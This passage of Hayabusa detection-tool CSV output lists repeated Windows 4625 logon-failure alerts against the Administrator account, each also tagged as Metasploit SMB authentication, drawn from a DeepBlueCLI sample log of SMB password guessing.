Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kQbCbAHrQilFmMZP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VUdXQOw98VVoksDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fISqpC8eKlaQGabv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s5Y0VryMAHjtB3n2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsjAHlztFIC8tBt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CiEQlAlTOhqOKpmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i7lUqZMROQXNUtQm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0eFCGEtOLzjUxI5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CqfOAGcVcwSgaeo3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hcqVJzkVgvUnebk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9ZpqiTGXqJlAQTZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qCzXKlJ2vPeqqdfa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tITW0ihpErFk3nKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MdQqr1T4frPNlulf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: niiXRpP5AVHpG9Hu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EThR98jZUdwNxbXQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBsJcIw859FfEkLD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kG4Tv5vauSWhbj8F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 453tjgRGMu46vC33 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fnzhhfszxJWxLCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWPkeL8TnAbC1nSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JrDmUzyK4Xxx6Jn1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMTf9D2yjumfS9LM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cCs65ithseTCORa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBrGAScjpAdScGmJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n90F99qBpmUUVLId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLeOkIG0hVHIOnN7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVx5uUtkaFIf7PWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kgd7lCQUQ3dHN18S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8m2MmpFVK9Uojp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0NZjeu3lb5xddVQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YjjXBZnyWt0ljzpv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sinFBozyUR0sBadM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Au22Y0LIuvTmZDpy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QDWW3VfZ7rKayV2v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zPgaFDZtc5wEupnq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpYZc2TTDfJFnPHo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rYKkl1iHImW9NwKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KxA2dh1iUMaMWOkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sCzEzW8jDZGGZcpd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p8510u5OsCVd94I5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2a0whHngnv7o1Bz2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xy6cGuYgubjlXoMw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luoXLN2XZQC0lHfu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8jdKLW96haKCHHXI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9SQSH6E1aKXu1o7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nOUdKa838wK1mLFw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 